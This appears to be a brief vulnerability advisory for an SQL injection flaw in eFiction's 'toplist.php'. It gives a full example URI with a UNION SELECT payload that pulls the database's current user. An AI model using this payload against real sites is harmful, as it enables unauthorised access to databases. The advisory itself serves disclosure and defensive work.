• info
• discussion
• exploit
• solution
• references

eFiction 'toplist.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/preview/toplists.php?list=1'+and+1=0+union+select+1,2,current_user,4,5,6,7,8/*